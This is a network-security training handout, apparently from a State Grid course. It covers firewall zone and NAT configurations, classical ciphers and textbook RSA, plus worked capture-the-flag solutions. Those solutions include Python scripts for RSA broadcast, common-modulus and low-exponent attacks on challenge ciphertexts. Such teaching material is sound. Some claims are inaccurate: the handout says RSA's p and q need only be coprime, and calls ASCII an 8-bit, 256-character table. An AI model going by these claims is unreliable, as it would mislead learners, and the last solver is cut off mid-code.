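Hands-on Network Attack and Defense Exercises (State Grid training, Tai'an, Shandong)

I. Network firewall configuration

Exercise 1: DMZ and Untrust interzone policy configuration

  • Task: configure a security policy so that PC1 (2.2.2.1) in the untrust zone can access the server1 server in the DMZ zone.

  • Resulting topology
    [Image: topology diagram]

  • Commands to run on each device (can be copied and executed directly)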

    • FW1
    system-view
    sysname FW1
    interface g0/0/1
    ip address 192.16.1.254 24
    interface g0/0/2
    ip address 2.2.2.254 24
    quit
    firewall zone dmz
    add interface GigabitEthernet 0/0/1
    firewall zone untrust
    add interface GigabitEthernet 0/0/2
    quit
    policy interzone untrust dmz inbound
    policy 2
    policy source 2.2.2.1 mask 32
    policy destination 192.16.1.1 mask 32
    action permit
    quit
    quit
    

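Exercise 2: Three-zone topology

  • Task: configure the firewall's interzone packet-filtering policies so that the network segment of PC1 can access Client1, but Client1 cannot access PC1's segment; Client1 may only access the ICMP and HTTP services of Server1.

  • Resulting topology
    [Image: topology diagram]

  • Commands to run on each device (can be copied and executed directly)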

    • FW1
    system-view
    sysname FW1
    # Firewall interface configuration
    interface GigabitEthernet0/0/1
    ip address 192.168.1.254 24
    interface GigabitEthernet0/0/2
    ip address 172.16.1.254 24
    interface GigabitEthernet0/0/3
    ip address 10.1.1.254 24
    quit
    # Add the firewall interfaces to their security zones
    firewall zone trust
    add interface GigabitEthernet0/0/1
    firewall zone dmz
    add interface GigabitEthernet0/0/2
    firewall zone untrust
    add interface GigabitEthernet0/0/3
    quit
    # Configure the interzone policies
    policy interzone trust untrust outbound
    policy 10
    policy destination 10.1.1.1 mask 32
    policy source 192.168.1.0 mask 24
    action permit
    quit
    policy interzone untrust dmz inbound
    policy 1
    policy source 10.1.1.1 mask 32
    policy destination 172.16.1.1 mask 32
    policy service service-set icmp http
    action permit
    quit
    quit
    

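Exercise 3: Source NAT address translation lab

  • Task: to let users in the private 192.168.1.0/24 segment access the Internet normally, a source NAT policy must be configured on the NGFW. In addition to the IP address of the public interface,
    the company has obtained 2 IP addresses (1.1.1.10~1.1.1.11) from the ISP for translating private addresses to public addresses; after translation, 1.1.1.0/24 must be reachable.

  • Resulting topology
    [Image: topology diagram]

  • Commands to run on each device (can be copied and executed directly)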

    • AR2
    system-view
    sysname AR2
    interface GigabitEthernet 0/0/0
    ip address 192.168.1.254 24
    interface GigabitEthernet 0/0/1
    ip address 10.10.1.1 24
    quit
    ip route-static 0.0.0.0 0 10.10.1.2
    
    • FW1
    system-view
    sysname FW1
    interface GigabitEthernet 0/0/1
    ip address 10.10.1.2 24
    interface GigabitEthernet 0/0/2
    ip address 1.1.1.254 24
    quit
    firewall zone trust
    add interface GigabitEthernet0/0/1
    firewall zone untrust
    add interface GigabitEthernet0/0/2
    quit
    ip route-static 0.0.0.0 0 1.1.1.1
    ip route-static 192.168.1.0 24 10.10.1.1
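    # Configure black-hole routes for the NAT pool addresses (avoids routing loops for traffic sent to the pool)
    ip route-static 1.1.1.10 32 NULL0
    ip route-static 1.1.1.11 32 NULL0
    # Configure the interzone policy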
    policy interzone trust untrust outbound
    policy 1
    policy source 192.168.1.0 mask 24
    policy destination 1.1.1.0 mask 24
    policy destination 2.2.2.0 mask 24
    action permit
    quit
    quit
    # Configure source NAT (address pool and NAT policy)
    nat address-group 1 1.1.1.10 1.1.1.11
    nat-policy interzone trust untrust outbound
    policy 2
    action source-nat 
    policy source 192.168.1.0 mask 24
    address-group 1 
    quit
    quit
    
    • Router
    system-view
    sysname Router
    interface GigabitEthernet 0/0/0
    ip address 1.1.1.1 24
    interface GigabitEthernet 0/0/1
    ip address 2.2.2.254 24
    quit
    ip route-static 0.0.0.0 0 1.1.1.254
    

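Mock exam

  • Task:
    To let users in the private 192.168.1.0/24 segment access the Internet normally, a source NAT policy must be configured on the NGFW.
    In addition to the IP address of the public interface, the company has obtained 2 IP addresses (1.1.1.10~1.1.1.11) from the ISP for translating private addresses to public addresses; after translation, 1.1.1.0/24 and 2.2.2.0/24 must be reachable.
    The network environment is shown in the figure; Router is the access gateway provided by the ISP.
    1. Configure the IP addresses and gateway addresses of the office PCs.
    2. Configure the router interface addresses and routes
    (1) AR1: configure an outbound default route;
    (2) Router: configure the interface addresses.
    3. Configure the firewall
    (1) Configure the interface addresses and assign security zones;
    (2) Configure routes for connectivity:
    outbound: a default route and black-hole routes
    inbound: a specific route.
    (3) Configure interzone policy "policy 1" so that 192.168.1.0/24 in the Trust zone can access 1.1.1.0/24 and 2.2.2.0/24 in the Untrust zone.
    4. Configure NAPT so that users in the internal 192.168.1.0/24 segment are translated to the public address pool address-group 1 (1.1.1.10~1.1.1.11) when accessing the Internet.
    5. Verify: ping 2.2.2.1 from PC1 and PC2, then view the session table on the firewall and check whether source NAT translation succeeded.

  • Resulting topology
    [Image: topology diagram]

  • Commands to run on each device (can be copied and executed directly)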

    • AR1
    system-view
    sysname AR1
    interface GigabitEthernet 0/0/0
    ip address 192.168.1.254 24
    interface GigabitEthernet 0/0/1
    ip address 10.10.1.1 24
    quit
    ip route-static 0.0.0.0 0 10.10.1.2
    
    • FW
    system-view
    sysname FW
    interface GigabitEthernet 0/0/1
    ip address 10.10.1.2 24
    interface GigabitEthernet 0/0/2
    ip address 1.1.1.254 24
    quit
    firewall zone trust
    add interface GigabitEthernet0/0/1
    firewall zone untrust
    add interface GigabitEthernet0/0/2
    quit
    ip route-static 0.0.0.0 0 1.1.1.1
    ip route-static 192.168.1.0 24 10.10.1.1
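    # Configure black-hole routes for the NAT pool addresses (avoids routing loops for traffic sent to the pool)
    ip route-static 1.1.1.10 32 NULL0
    ip route-static 1.1.1.11 32 NULL0
    # Configure the interzone policy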
    policy interzone trust untrust outbound
    policy 1
    policy source 192.168.1.0 mask 24
    policy destination 1.1.1.0 mask 24
    policy destination 2.2.2.0 mask 24
    action permit
    quit
    quit
    # Configure source NAT (address pool and NAT policy)
    nat address-group 1 1.1.1.10 1.1.1.11
    nat-policy interzone trust untrust outbound
    policy 2
    action source-nat 
    policy source 192.168.1.0 mask 24
    address-group 1 
    quit
    quit
    
    • Router
    system-view
    sysname Router
    interface GigabitEthernet 0/0/0
    ip address 1.1.1.1 24
    interface GigabitEthernet 0/0/1
    ip address 2.2.2.254 24
    quit
    ip route-static 0.0.0.0 0 1.1.1.254
    

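II. Network security: cryptography

1. Common encodings (brief introduction; see the slides for details)

  1. ASCII
    In a computer, all data is represented in binary for storage and computation. ASCII is
    the code table that maps 8-bit binary values to 256 characters.

  2. Morse code
    "." denotes a short signal, "-" a long signal, and "/" or " " a separator.

  3. Base encodings
    The purpose of base encodings is to express arbitrary characters using a small set of common,
    printable characters.

2. Common classical ciphers (brief introduction; see the slides for details)

  1. Rail fence cipher:
    The key is a single number k, the length of the fence. The plaintext is split into groups of k
    characters, and the n-th characters of every group are then joined in turn, producing a scrambled string.

  2. Caesar cipher:
    Every letter of the plaintext is replaced by the letter a fixed number of positions later (or earlier)
    in the alphabet.

  3. Vigenère cipher (a special Caesar cipher):
    The Vigenère cipher is made up of several Caesar ciphers with different shifts. The ciphertext is produced with the table method, and the shifts are determined by the key.

  4. Yunying cipher:
    Also called the 01248 cipher. 0 is the separator; the non-zero digits of each group are added up to give the index
    (1-26) of an English letter. Uppercase only.

3. Modern cryptography: RSA

  • RSA is a typical asymmetric cryptosystem; its security rests on the difficulty of factoring large integers.
  • Encryption
    Public key (E, N)
    [Image: encryption formula]
  • Decryption
    Private key (D, N)
    [Image: decryption formula]
  • How E and D are computed
    ① Choose two coprime numbers p and q (note up front: the same p and q can yield several (E, D) pairs)
    ② N = p * q
    ③ L = lcm(p-1, q-1), where lcm is the least common multiple
    ④ Choose E: it is not unique, so pick any value that satisfies the two conditions below (gcd is the greatest common divisor):
    1 < E < L and gcd(E, L) = 1 (that is, E and L are coprime)
    ⑤ Compute D: once E is fixed, D is unique, because only one value can be computed. It must satisfy the two conditions below. Computing D is more awkward; it is found by enumerating 2 to L (see the Java program written by the author)
    1 < D < L and E*D mod L = 1
    ⑥ A worked example with concrete numbers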
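    public class RsaDemo {
        public static void main(String[] args) {
            // p and q only need to be coprime
            int p = 17;
            int q = 19;
            // n = p*q = 323
            int n = p * q;
            // L = lcm(p-1, q-1) = lcm(16, 18) = 144
            int L = 144;
            // 5 is picked arbitrarily; it only has to be coprime to L. (7 would also work; a different E gives a different D.)
            int E = 5;
            int D;
            // The loop yields the pair public key (5), private key (29). Public and private keys are interchangeable: if the public key were 29, the private key would be 5.
            for (int i = 2; i < L; i++) {
                D = i;
                if (E * D % L == 1) {
                    System.out.println(D);
                    break;
                }
            }
            // Suppose the plaintext is 123; then ciphertext = 123^5 mod 323 = 225.
            // Decryption: plaintext = 225^29 mod 323 = 123, so the decrypted plaintext is 123. (The author could not demonstrate this in Java, because the numbers become too large and the calculation goes wrong.)
        }
    }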
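
The key computation from steps ① to ⑥, as an added Python example (not the author's program): it derives D with the extended Euclidean algorithm instead of enumeration, and uses square-and-multiply so that 225^29 mod 323 is computed without huge intermediate numbers. The function names are illustrative, and p and q are assumed to be distinct primes, as 17 and 19 are.

```python
# Added example: textbook RSA with the page's numbers (p=17, q=19, E=5, m=123).
# Function names are illustrative. Assumes p and q are distinct primes.
from math import gcd


def lcm(a, b):
    """Least common multiple."""
    return a // gcd(a, b) * b


def egcd(a, b):
    """Extended Euclid: return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_x, x = x, old_x - q * x
        old_y, y = y, old_y - q * y
    return old_r, old_x, old_y


def modinv(e, L):
    """The unique D in 1..L-1 with E*D mod L == 1 (needs gcd(E, L) == 1)."""
    g, x, _ = egcd(e, L)
    if g != 1:
        raise ValueError("E and L are not coprime, so no D exists")
    return x % L


def modpow(base, exp, mod):
    """Square-and-multiply. Every intermediate value stays below mod**2,
    so 225**29 mod 323 needs no big-number arithmetic."""
    result = 1
    base %= mod
    while exp:
        if exp & 1:
            result = result * base % mod
        base = base * base % mod
        exp >>= 1
    return result


def make_keypair(p, q, e):
    """Return ((E, N), (D, N)) following steps 1 to 5 of the text."""
    n = p * q
    L = lcm(p - 1, q - 1)
    if not (1 < e < L and gcd(e, L) == 1):
        raise ValueError("E must satisfy 1 < E < L and gcd(E, L) == 1")
    return (e, n), (modinv(e, L), n)


def encrypt(m, public_key):
    e, n = public_key
    if not 0 <= m < n:
        raise ValueError("the message must be smaller than N")
    return modpow(m, e, n)


def decrypt(c, private_key):
    d, n = private_key
    return modpow(c, d, n)


def valid_exponents(p, q):
    """All E allowed by step 4 for this p and q."""
    L = lcm(p - 1, q - 1)
    return [e for e in range(2, L) if gcd(e, L) == 1]


if __name__ == "__main__":
    public, private = make_keypair(17, 19, 5)
    print("public", public, "private", private)
    c = encrypt(123, public)
    print("ciphertext", c, "decrypted", decrypt(c, private))
    print("first valid E values:", valid_exponents(17, 19)[:5])
```
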
    

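4. Characteristics of common RSA attacks (for identifying cyber-range challenges)

  1. RSA broadcast attack: several C (ciphertexts) and several N
  2. RSA common-modulus attack: two or more E and a single N
  3. RSA low encryption exponent with a small plaintext: E (public-key exponent) is fairly small
  4. RSA low decryption exponent (also known as the Wiener attack): E (public-key exponent) is very large

5. State Grid Technology College (Tai'an) cyber-range challenges (walkthrough)

* Overview of the challenges

[Image: challenge overview]

* Caesar cipher (the first block is the challenge, the second the solving program, the third the answer)

  • Challenge
    A string of the form flag{***} encrypts to the ciphertext gmcj\x80o|\x84\x86X\xd6; find the plaintext.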
    
    a='gmcj\x80o|\x84\x86X\xd6'
    b='flag{'
    c=''
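    # Offsets between the ciphertext and the known prefix 'flag{': 1, 1, 2, 3, 5 (Fibonacci)
    for i in range(5):
        print(ord(a[i])-ord(b[i]))
    # Subtract the i-th Fibonacci number from the i-th ciphertext character
    temp1=1
    temp2=1
    temp3=1
    for i in range(len(a)):
        c+=chr(ord(a[i])-temp1)
        temp3=temp2
        temp2=temp1+temp2
        temp1=temp3
    print(c)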
    
    flag{good!}
    

* Base encoding

  • Challenge:
    Nhwit8Y3NUordknZocPMYFRxj2KiaJCsvVZtQ8NXCzTU4ZGCGfkTtqrycGbmadsQTLfmsK2
    
    flag{327a6c4304ad5938eaf0efb6cc3e53dc}
    

* RSA broadcast attack

  • Challenge
    e = 13
    
    Find the plaintext m.
    
    # coding: utf-8
    # exp
    from Crypto.Util.number import long_to_bytes
    
    from gmpy2 import invert, iroot
    def broadcast(n1, n2 ,n3, c1, c2, c3):
    	# Chinese Remainder Theorem: combine c_i = m^e mod n_i into m^e mod (n1*n2*n3)
    	n = [n1, n2, n3]
    	C = [c1, c2, c3]
    	N = 1
    	for i in n:
    		N *= i
    	Ni = []
    	for ni in n:
    		Ni.append(N // ni)
    	T = []
    	for i in range(3):
    		T.append(invert(Ni[i], n[i]))
    	X = 0
    	for i in range(3):
    		X += C[i] * Ni[i] * T[i]
    	m = X % N
    	return m
    def main():
    	e = 13
    	n1=92524936991597191087876963970818192699000837471047570833361814863690117215624182271726144669041983505659467638902416579902938926994684371370584528161658547137504224359103726996826330103457438735550313924659788985151016583670871569078001520895163276682652024979721765888037313024073111969080028401548915584860529087833415360261729733573929336020153998495183047171374610008025906107007868189633396254936451371399512715206524180885726466631961171680737032684040558335907848994165579980698323394324757126691913004750279340397367992376919586081940814067537894461505284800627760042934366651060568756658632559
    	n2=47882861583493769792652043915895885711938470011006735368086234918311630735291944884018382340034749356966691872199889087827165231003497124805297898314252131347116985861108032822805283869274755918189419610079937290554651399231597891881104734201327052955612523091262899866624251672392475330631436413697327575811187455580631861926088113872524607626161284142479284858683841270009524277280994923793597438628338107326420845170238602288323355648736295910738442702007217991223982629181446112444553483593640081243492596463130017759009113212441145454676101800987537042692739071914495135292776335690885163386239823
    	n3=105121345161568778537500796564275801401688120648445009173256974993138370917194265956191653980821195803457686157829335539012829141165774234357585374787579491811543376426820559128464240217101697871504951848038499315061750224915924576236894677500809983104794816902716120180059054924047804882769032274460760929849651216442149592488466827102265838579767250228595595985281651367536842639511918837429414489458024639144491007786519471599065644854371866037488287093126401150008050984606591522815813056118371138671245796393328811148380957740025982059114031866967745062373001639733954044095500428145039342544316863
    	c1=44021578094179205932288298141583959143684018023664861177042691325754443818081769084395526425284909486720278064005104021870779164431277103806967796287490679352306668404569592132266698373208122284552264163546051651872409079297010913580413579444650783707897056758786659608737964832479995896968436467220867962184514688618565540693876233579366577229142298900560553639547522576819353391241452856878889145548736763265869688622430860748392365294208339009676510164941363680546926816583009736795353772131670880911914898624023087011402631179428290830080632860018539213282913972994459264975373437732385771617501637
    	c2=19445073906555253525537245829874857990059701639831505552348010486285159596127835263918512553697397476873127356642619496234633582423750907283097479961744699507154761785876909054640469070258906229634558472281655582285098166686817554016788306501605263871435722422254644063131311882876128400550920237748436643513210258820188176528482039434419377375796274744374628283314059522000471608750708748421030848435993883391350222398896915429103628495322429882381312084266081599604608032101884229888851328850487143780426635290589683937293327728914907025978560639685595554270915517277993755511283304326189949765982897
    	c3=89991155615199608389965602227251502610230252313158034447374008510409684542002392814878747524489155039338425955744133893962504874964491819169815804880568448244729828000774292853049676484446788711185335159667765003208350967995541408188418810764716808842626467643283794783242721462622492803175198830142984334432322052011230222733236145604638886913445503989451701053752307663530348935590174311775001895650764826399881247640558440586130482610759307610366060500592395382481045472877136782085374872948572290907761673984329777238817152204414479425934681180267452178076205241878700707237400323702289456477071714
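    	m = broadcast(n1, n2 ,n3, c1, c2, c3)
    	# m is m^e as a plain integer when m^e < n1*n2*n3, so an exact integer e-th root recovers the plaintext
    	print(long_to_bytes(int(iroot(m,e)[0])))
    	print(m)
    if __name__=="__main__":
    	main()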
    
    
    flag{09a3f8480a4a95478274b23fcec4073b}
    

* RSA common-modulus attack

  • Challenge
    e1=3961
    
    e2=39661
    
    Find the plaintext m.
    
    import libnum
    import gmpy2
    
    n=4606214404559381625811305893421796457727307893522234545002637928126211269316759285703114898387185124444125403886775937362327115049887275542033614535006266982230728414436881929499120917023099931731154480279878961462890606099680544893518162357543517663448598189398364777700764201628600330674624309734150799327802881199123017672936478453599758403904501509023550075462646307259074918554393814051649454027370323722466596794338785975786762544233089948295159326932530142156693536761290325166663837198648438565756950669154631177080413510965650961179598568656438763915125788387042278733534990706259579644193764771790940175060031403391673835392301230762706826357767139806907288386554701237375970122539874558801064426127357993451875548199398779957689591805731666683159713949539956972421365823968509961851731675821768810158549871866855970380999634262510655193972343386664235281822656401649891282959851508174717635599479503678209534201303747137636130146004985863109286598472225239106174001881488566658746814277408673886092025714672774526054105715514515828695891197567723115621647063617381815989618596582463826784688350794675454728821530564058656768355901167368323058748745770407030433581712448954059916009598250320631
    e1=3961
    e2=39661
    c1=3837499388455120656867996348713152796258019690191969988843127291215462712127620403068753553367088567073867471571201908322320465885943205429972913247041289009706287142724312212436737393236413143994626064490297937530087295750992739586545671144359484383264416324198087122816045177774320769235002566511128670719776095088328298829387614542992594074076230396124614177801908183924912637040706013914289088681433669011388036613446129356409413670671292406747678040705779573864607561270257783753748995854744272261777745636348393124375470191723259093713990560245604156212381175794384987660240632069882683243408009197662876297392776499829139942540170411011193477140582442543447240154732018020414636543952622244587297337516302276577587483341242855629750723299196962652280980029833172306621035030602001489526266471628252411072394649732898826828650082323467831447543341986110050674843712168131578454880285847519984505884537048953401917291988302822640969586523078595398214110577364335572792040908066353542797711044609986818407526276623134883604311196929194845167221887179349308411987286918430402955406174717953513907354499985297123553922220999152076137186010008440300860402391806368607939701458636422792104581468853500339
    c2=516144633013811112886792001654989445834450364017535055282084776134066047140744541127402208154454108824957465184368293981255055118766542087965844721575465557839124537125203069445424537449162248750901106984608201441498157229171325843327039518601149565688635319745251796978492834090711540621416140758667450469649514609322384993669552881669681643734184080837236954659699909281354088531456248420524775156766607176790285297650370408663229065136104192025279935464662164797806028666156110000187437655498203412062698329219949262308813700244536928610798624752546494028242097373072925895540589396299985380749410374578133264869591859011242071818144027791627763313385218323524098953707340678077645156833716581370443623533390586314124336677442618178538774474320682299728631032427623000842464650999067403676635741792096149059056559990879456070044148573842587508520690390257812232611111313987359329328645067153673069467853801400328324497262436640915685606632521893541501538305824059283975767319250940633479844145489924915801010604008722966099476172080678828712862231281409246368873360519426922362725054985113908840947023751123519796668861742282682908592604065917742647822853267591956812814541551684160810120141854610728
    
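    def exp_def(e1,e2,c1,c2,n):
        # Extended Euclid: s = gcd(e1, e2) and s1*e1 + s2*e2 = s (gcd(3961, 39661) = 17 here)
        s,s1,s2 = gmpy2.gcdext(e1, e2)
        # c1^s1 * c2^s2 = m^(s1*e1 + s2*e2) = m^s (mod n); a negative exponent means a modular inverse.
        # The exact integer s-th root then recovers m, which works when m^s < n.
        m = gmpy2.iroot((pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n,s)[0]
        return int(m)
    
    m=exp_def(e1,e2,c1,c2,n)
    print(libnum.n2s(m))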
    
    flag{gongmogongji!}
    

* Morse code

  • Challenge
    -- --- .-. ... . -.-. --- -.. .
    
    flag{MORSECODE}
    

* Caesar cipher 3

```txt
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']

alphabet = 'abcdefghijklmnopqrstuvwxyz{}'

flag = '************'
c = ''
count=0
for i in flag:
	count=count+1
	print(count)
	c+= table[alphabet.index(i)]
print(c)

# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'	
```
```python
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']

alphabet = 'abcdefghijklmnopqrstuvwxyz{}'

flag = ''
b=[]
c = '0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
for i in range(0,len(c),5):
	print(c[i:i+5])
	flag+=alphabet[table.index(c[i:i+5])]
print(flag)

# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
```
```txt
flag{taianxiaoqu}
```

* Caesar cipher 2

  • Challenge
    The ciphertext is fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT; the plaintext has the form flag{***}.
    
    a='fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT'
    b='flag{'
    c=''
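    # Offsets against the known prefix 'flag{': 0, -1, 2, -3, 4 (magnitude i, alternating sign)
    for i in range(5):
        print(ord(a[i])-ord(b[i]))
    # Undo the shift: subtract i at even positions, add i at odd positions
    for i in range(len(a)):
        if i%2==0:
            c+=chr(ord(a[i])-i)
        else:
            c+=chr(ord(a[i])+i)
    print(c)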
    
    flag{d7c442c4-c4c7-46c6-9407-35f030a46cf2}
    

* Vigenère

  • Challenge
    The ciphertext ``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x was produced with a Vigenère cipher using a 6-character key; the plaintext has the form flag{***}.
    
    a='``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x'
    b='flag{'
    c=''
    
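    # Vigenère cipher
    # Offsets between the ciphertext and the known prefix 'flag{' give the first five key values
    for i in range(5):
        print(ord(a[i])-ord(b[i]))
    # 6-value key: the five offsets from the known prefix plus a sixth value (-5)
    key=[-6,-12,-7,-5,-8,-5]
    print(key)
    for i in range(len(a)):
        c+=chr(ord(a[i])-key[i%6])
    print(c)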
    
    flag{Vigenère_is_very_interesting!!}
    

* Rail fence cipher

  • Challenge
    A string of the form flag{***} encrypts with the rail fence cipher to fghai}l{anmazlma, where the number of rails is 3.
    
    # _*_ encoding:utf-8 _*_
    import math
    
    
    def buwei(encrypted_str,fence_length):    # padding helper, e.g. 14, 4
        str_len = len(encrypted_str)
        fence_count = math.ceil(str_len/ fence_length)   # gives 4
        target_length = fence_count*fence_length
        jiequ = []    # slices cut from the end of the string
        while str_len<target_length:
            encrypted_str = encrypted_str + '*'
            jiequ.append(encrypted_str[-fence_count :])
            encrypted_str = encrypted_str[:-fence_count]
            str_len += 1
    
        jiequ.reverse()
        s = ''
        for i in jiequ:
            s = s + i
    
        result = encrypted_str + s
        return result
    
    
    def decrypt_fence(encrypted_str,fence_length):
        encrypted_str = buwei(encrypted_str,fence_length)
        if fence_length>=len(encrypted_str) or fence_length<1:
            # Message: "fence length too large or too small, nothing to decrypt"
            print("栅栏长度太大或者太小,无需解密")
            return
        fence_count = math.ceil(len(encrypted_str)/fence_length)
        elen=len(encrypted_str)
    
        # b = elen // f  # divide the actual string length by the divisor f computed above
        result = {x: '' for x in range(fence_count)}
        for i in range(elen):  # loop once per character of the string
            a = i % fence_count
            result.update({a: result[a] + encrypted_str[i]})  # append the character to its column and update the data
        d = ''
        for i in range(len(result)):
            d += result[i]
    
        d = d.replace("*", '')
        # Message: "assuming {fence_length} characters per rail, the decryption result is: {d}"
        print(f'假设每栏字数为:{fence_length},解密结果为:{d}')  # print the result and move on to the next loop
    
    for i in range(2,10):
        decrypt_fence('fghai}l{anmazlma', i)
    
    flag{zhalanmima}
    

* Yunying cipher

  • Challenge
    8842101220480224404014224202480122
    
    a='8842101220480224404014224202480122'
    # 0 is the separator between letters
    s=a.split('0')
    print(s)
    l=[]
    flag=''
    # The digits of each group add up to the letter's position (1-26)
    for i in range(len(s)):
        total=0
        for j in range(len(s[i])):
            total+=int(s[i][j])
        l.append(total)
    print(l)
    for i in range(len(l)):
        flag+=chr(ord('A')+l[i]-1)
    print(flag)
    
    
    flag{WELLDONE}
    

* Base64 steganography

  • Challenge
    IGZvcnRoLiBNaWNyb2RvdHMgd2VyZSB0eXBpY2FsbHkg
    bWludXRlLCBhcHByb3hpbWF0ZWx5IGxlc3MgdGhhbiB0aGUgc2l6ZSBvZiB0aGUgcGVyaW9kIHByb2R=
    dWNlZCBieSBhIHR5cGV3cml0ZXIuIFdXSUkgbWljcm9kb3RzIG5lZWRlZCB0byBiZSBlbWJlZGRlZB==
    IGluIHRoZSBwYXBlciBhbmQgY292ZXJlZCB3aXRoIGFuIGFkaGVzaXZlIChzdWNoIGFzIGNvbGxvZGlvbikuIFR=
    aGlzIHdhcyByZWZsZWN0aXZlIGFuZCB0aHVzIGRldGVjdGFibGUg
    Ynkgdmlld2luZyBhZ2FpbnN0IGdsYW5jaW5nIGxpZ2h0LiBBbHRlcm5hdGl2ZSB0ZWNobmlxdWVzIGluY2x1ZGVk
    IGluc2VydGluZyBtaWNyb2RvdHMgaW50byBzbGl0cyBjdXQgaW50byB0aGUgZWRnZSBvZv==
    IHBvc3QgY2FyZHMuDQoqIER1cmluZyBXb3JsZCBXYXIgSUksIGEgc3B5IGZvciB=
    SmFwYW4gaW4gTmV3IFlvcmsgQ2l0eSwgVmVsdmFsZWW=
    IERpY2tpbnNvbiwgc2VudCBpbmZvcm1hdGlvbiB0byBhY2NvbW1vZGF0aW9=
    biBhZGRyZXNzZXMgaW4gbmV1dHJhbCBTb3V0aCBBbWVyaWO=
    YS4gU2hlIHdhcyBhIGRlYWxlciBpbiBkb2xscywgYW5kIG==
    aGVyIGxldHRlcnMgZGlzY3Vzc2VkIGhvdyBtYW55IG9mIHRoaXMgb3IgdGhhdCBkb2xs
    IHRvIHNoaXAuIFRoZSBzdGVnb3RleHQgd2FzIHRoZSBkb2xsIG9yZGVycywgd2hpbGUgdGhl
    IGNvbmNlYWxlZCAicGxhaW50ZXh0IiB3YXMgaXRzZWxmIGVuY2+=
    ZGVkIGFuZCBnYXZlIGluZm9ybWF0aW9uIGFib3V0IHNoaXAgbW92ZW1lbnRzLF==
    IGV0Yy4gSGVyIGNhc2UgYmVjYW1lIHNvbWV3aGF0IGZh
    bW91cyBhbmQgc2hlIGJlY2FtZSBrbm93biBhcyB0aGX=
    IERvbGwgV29tYW4uDQoqIENvbGQgV2FyIGNvdW50
    ZXItcHJvcGFnYW5kYS4gSW4gMTk2OCwgY3JldyBtZW1iZW==
    cnMgb2YgdGhlIFVTUyBQdWVibG8gKEFHRVItMikgaW50ZWxsaWdlbmNlIHNoaXAgaGVsZCBhcyBwcm==
    aXNvbmVycyBieSBOb3J0aCBLb3JlYSwgY29tbXVuaWNhdGVkIGluIHNpZ25=
    IGxhbmd1YWdlIGR1cmluZyBzdGFnZWQgcGhvdG8gb3Bwb3J0
    dW5pdGllcywgaW5mb3JtaW5nIHRoZSBVbml0ZWQgU3RhdGVzIHRoZXkg
    d2VyZSBub3QgZGVmZWN0b3JzIGJ1dCByYXRoZXIgd2VyZSBiZWluZyBoZWxkIGNh
    cHRpdmUgYnkgdGhlIE5vcnRoIEtvcmVhbnMuIEluIG90aGVyIHBob3Rv
    cyBwcmVzZW50ZWQgdG8gdGhlIFVTLCBjcmV3IG1lbWJlcnMgZ2F2ZSAidGhlIGZpbmdlciIgdG8g
    dGhlIHVuc3VzcGVjdGluZyBOb3J0aCBLb3JlYW5zLCBpbiBhbiBhdHRlbXB0IHRvIE==
    ZGlzY3JlZGl0IHBob3RvcyB0aGF0IHNob3dlZCB0aGVtIHNtaQ==
    bGluZyBhbmQgY29tZm9ydGFibGUuDQoNCi0tDQpodHRwOi8vZW4ud2lraXBlZGlhLm9yZw==
    L3dpa2kvU3RlZ2Fub2dyYXBoeQ0K
    
    
    import base64

    def get_diff(s1, s2):
        """Compare the stego line s1 with its canonical re-encoding s2 and return
        the alphabet-index distance at the first differing character."""
        base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
        for i in range(len(s2)):
            if s1[i] != s2[i]:
                # stego value minus the canonical value gives the hidden bits
                return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
        return 0


    def b64_stego_decode():
        with open("stego.txt", "rb") as file:
            lines = file.readlines()
        print(len(lines))
        x = ''                                      # x is the recovered bit string
        for line in lines:
            stego = str(line, encoding="utf-8").strip()
            # Decode, then re-encode, to obtain the canonical Base64 form of the line
            realtext = str(base64.b64encode(base64.b64decode(stego)), encoding="utf-8")
            diff = get_diff(stego, realtext)        # difference between the stego line and the canonical line
            n = stego.count('=')                    # each '=' leaves 2 spare bits
            if diff:
                x += bin(diff)[2:].zfill(n * 2)
            else:
                x += '0' * n * 2
        flag = ''
        for i in range(0, len(x), 8):
            byte = int(x[i:i + 8], 2)
            if byte:                                # skip all-zero bytes
                flag += chr(byte)
        print(len(flag))
        print(flag)

    if __name__ == '__main__':
        b64_stego_decode()
    	
    
    flag{Base_sixty_four_point_five}
    

* RSA: low encryption exponent, small plaintext

  • Challenge
    n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691
    e = 3
    c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927
    Find the plaintext m.
    
    import libnum
    import gmpy2
    
    n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691
    e = 3
    c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927
    
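    def exp(n, e, c):
        # With a small e and a small m, m**e = c + k*n for some small k.
        # Try k = 0, 1, 2, ... until c + k*n is a perfect e-th power.
        k = 0
        while True:
            m, exact = gmpy2.iroot(k * n + c, e)
            if exact:
                print(m)
                print(k)
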